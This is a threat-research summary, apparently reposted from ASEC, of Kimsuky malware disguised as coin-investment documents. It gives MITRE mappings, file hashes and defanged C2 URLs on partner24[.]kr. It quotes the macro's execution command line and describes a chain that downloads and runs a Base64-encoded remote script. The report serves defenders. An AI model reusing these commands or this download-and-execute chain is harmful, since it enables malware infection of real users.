Threat Research

Distribution of Malware Disguised as Coin and Investment-related Content – ASEC BLOG

Securonix

ASEC reports the distribution of malware disguised as coin exchange and investment content, delivered as self-extracting executables and Word documents. The operation is attributed to the Kimsuky group, and it uses macros, scripting, and URL-based commands to download additional payloads from a C2 hosted at partner24.kr. #Kimsuky #Mshta

Keypoints

  • Malware distributed as coin-investment themed files, including executables and a Word document, with User-Agent evidence pointing to Kimsuky.
  • Confirmed filenames include multiple 2023-era items (e.g., 20230717_030190045911.pdf .exe and others) and spoofed icons to resemble legitimate documents.
  • Executables are self-extracting archives that, when opened, generate normal document files and trigger a script execution chain.
  • Word document contains a VBA macro masquerading as a coin-exchange document; enabling content launches the macro.
  • Macro copies wscript.exe to word.exe in AppData, then downloads a Base64-encoded script from a remote URL (kk.php) and decodes it to set.sl for execution.
  • Observed malicious URLs and C2 activity (e.g., biz.php, doc1.php, doc2.php, kk.php on partner24.kr) with potential credential exfiltration and further payload deployment.

MITRE Techniques

  • [T1036] Masquerading – The executables identified in Table 1 are disguised with Word document and PDF icons, making them appear like normal files. Quote: ‘The executables identified in Table 1 are disguised with Word document and PDF icons, making them appear like normal files.’
  • [T1204.002] User Execution – The document asks users to enable content, manipulating them to run macros. Quote: ‘the text color in the body is set to gray, manipulating users into clicking the Enable Content button.’
  • [T1059.005] VBScript – The macro downloads and executes a VBScript payload via word.exe (e.g., ‘cmd /c %appdata%word.exe //e:vbscript //b %USERPROFILE%set.sl’). Quote: ‘cmd /c %appdata%word.exe //e:vbscript //b %USERPROFILE%set.sl’
  • [T1218.005] Mshta – mshta.exe is used to execute the script code present in the malicious URL. Quote: ‘mshta.exe is utilized to execute the script code present in the malicious URL.’
  • [T1027] Data Encoding – The macro downloads a Base64-encoded script. Quote: ‘Base64-encoded script from hxxps://partner24[.]kr/mokozy/hope/kk.php before decoding it and saving it…’
  • [T1105] Ingress Tool Transfer – The macro downloads an additional script from a remote URL before execution. Quote: ‘downloads an additional Base64-encoded script from hxxps://partner24[.]kr/mokozy/hope/kk.php before decoding it’
  • [T1071.001] Web Protocols – The payload communicates with web URLs (e.g., biz.php, doc1.php, doc2.php, kk.php) indicating web-based C2 activity. Quote: ‘hxxps://partner24[.]kr/mokozy/hope/biz.php’

Indicators of Compromise

  • [Hash] File hashes – 8a5fd1e9c9841ff0253b2a6f1e533d0e, 002105e21f1bddf68e59743c440e416a, 17daf3ea7b80ee95792d4b3332a3390d, and 2 more hashes
  • [URL] Malicious URLs – hxxps://partner24[.]kr/mokozy/hope/biz.php, hxxps://partner24[.]kr/mokozy/hope/doc1.php, hxxps://partner24[.]kr/mokozy/hope/doc2.php, hxxps://partner24[.]kr/mokozy/hope/kk.php
  • [Filename] Observed filenames – 20230717_030190045911.pdf .exe, 0728-We**Wallet Automatic Withdrawal of Funds.docx.exe (assumed), 230728 We**Team – Wallet Hacking Similarities.docx.exe (assumed), We** Team – Ban on Cloud Usage.doc

Read more: https://asec.ahnlab.com/en/55944/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint